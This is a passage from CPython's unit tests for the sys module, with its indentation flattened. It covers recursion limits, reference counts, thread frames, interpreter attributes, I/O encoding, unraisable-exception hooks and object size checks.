depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
# The error message is specific to CPython
@test.support.cpython_only
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: _Py_CheckRecursiveCall: "
b"Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
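# Note: the loop above is a Fermat probable-prime check -- for a prime p and
# 1 <= x < p, Fermat's little theorem gives pow(x, p-1, p) == 1. Composite
# Carmichael numbers also pass, which is why the comment calls it "probable".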
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a nonexistent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
class A:
class B:
class X(Exception):
pass
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj")
report = stderr.getvalue()
testName = 'test_original_unraisablehook_exception_qualname'
self.assertIn(f"{testName}.<locals>.A.B.X", report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('5P2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('13P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
